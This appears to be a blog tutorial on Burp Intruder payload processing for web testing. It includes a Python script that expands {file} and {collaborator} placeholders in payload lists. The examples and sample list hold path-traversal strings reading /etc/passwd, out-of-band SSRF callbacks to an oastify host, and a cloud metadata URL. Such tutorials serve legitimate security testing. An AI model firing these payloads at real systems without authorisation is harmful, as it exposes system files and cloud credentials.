0x13 - Optimizing Payload Lists

Did you know some of the best vulnerabilities are not discovered using default payload lists?

You've probably seen payload lists that include placeholders like {file} or {collaborator}

These lists work pretty well for

  • file inclusion

  • arbitrary file read

  • SSRF attacks


However, used as-is they won't find anything, because the placeholders still need to be substituted with real values.

There is no file named {file} on Linux, Windows, macOS or anything else.

And you won't get a hit on your Collaborator server from a request to the literal host {collaborator}.

With the Payload processing feature in Burp Intruder, however, you can add a Match/replace rule whose regex matches the placeholder and swaps in an actual value before each payload is sent. Lines without the placeholder pass through unchanged, so the rest of the list keeps working.


How to do it

  1. Send your request to Intruder

  2. Set the injection point for your chosen parameter

  3. Load your favorite payload list

  4. Scroll down to Payload processing and add a new Match/replace rule with the regex and replacement value


Example 1 - look for the passwd file

Match: \{file\}
Replace: passwd

The replacement is only the file name, so this assumes the list entries already carry the directory part (for example ../../../../etc/{file}); if they don't, replace with a full path such as /etc/passwd instead. Regex rules are case-sensitive, so a list that spells the placeholder {FILE} needs (?i)\{file\} or a second rule.

Example 2 - listen for requests on Collaborator

Match: \{collaborator\}
Replace: ppi1cty6kllsnobn70ljb5g4bvhm5ct1.oastify.com

Copy the payload from your own Collaborator tab; the one shown here is only an illustration, and you will only see interactions for payloads generated by your own Collaborator client.

Example 3 - redirect to your own domain

Match: \{collaborator\}
Replace: yourdomain.com

Use a domain whose DNS and HTTP logs you control, so that when Collaborator isn't available any out-of-band request still lands somewhere you can see it.
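The same substitution can be done once, offline, so the expanded list works in any tool, not just Intruder. The script below is an added example written for this post, not a Burp feature or anybody's published wordlist: the sample payload lines and the replacement values (including the example-id.oastify.com stand-in) are constructed here. It does what the Match/replace rules in the procedure and Examples 1 to 3 do, and goes a little further: several values per placeholder fan a line out into one entry each, matching is case-insensitive like a (?i) rule, and lines that still carry an unknown {placeholder} after substitution are dropped, since that literal string is exactly what never gets a hit.

```python
import itertools
import re

# Constructed sample list in the placeholder style the post describes
# (illustrative lines, not a real published wordlist).
SAMPLE_PAYLOADS = [
    "../../../../etc/{file}",
    "..%2f..%2f..%2fetc/{file}",
    "/proc/self/cwd/etc/{FILE}",                 # upper-case variant some lists use
    "file:///etc/{file}",
    "http://{collaborator}/",
    "http://{collaborator}:8080/x",
    "http://169.254.169.254/latest/meta-data/",  # no placeholder, kept as-is
    "{unknown}/foo",                             # placeholder nobody defined
]

# Assumed replacement values; example-id.oastify.com is a stand-in for the
# payload you copy from your own Collaborator tab.
SUBSTITUTIONS = {
    "file": ["passwd", "hosts"],
    "collaborator": ["example-id.oastify.com"],
}

# Anything that still looks like {name} after substitution is unresolved.
PLACEHOLDER_RE = re.compile(r"\{\w+\}")


def expand_placeholders(payloads, substitutions, drop_unresolved=True):
    """Return the payload list with every {name} placeholder replaced.

    A placeholder with several values fans a line out into one entry per
    value (cartesian product when a line carries more than one placeholder).
    Matching is case-insensitive, mirroring a (?i) rule in Burp. Lines that
    still contain an unknown {placeholder} after substitution are dropped
    by default, because that literal string is what never hits anything.
    """
    patterns = {
        name: re.compile(r"\{" + re.escape(name) + r"\}", re.IGNORECASE)
        for name in substitutions
    }
    out, seen = [], set()
    for line in payloads:
        line = line.strip()
        if not line:
            continue
        names = [n for n, p in patterns.items() if p.search(line)]
        # product() of zero iterables yields one empty tuple, so a line with
        # no placeholders goes through the loop exactly once, unchanged.
        for combo in itertools.product(*(substitutions[n] for n in names)):
            candidate = line
            for name, value in zip(names, combo):
                # A function as the replacement keeps backslashes in values
                # such as windows\win.ini literal instead of treating them
                # as regex escapes in the replacement template.
                candidate = patterns[name].sub(lambda _m, v=value: v, candidate)
            if drop_unresolved and PLACEHOLDER_RE.search(candidate):
                continue
            if candidate not in seen:
                seen.add(candidate)
                out.append(candidate)
    return out


if __name__ == "__main__":
    # Print the expanded list so it can be loaded straight into Intruder.
    print("\n".join(expand_placeholders(SAMPLE_PAYLOADS, SUBSTITUTIONS)))
```

Run it and redirect stdout to a file, then load that file as a simple list in Intruder; there is then no processing rule to forget, and the same list can be fed to ffuf or any other fuzzer.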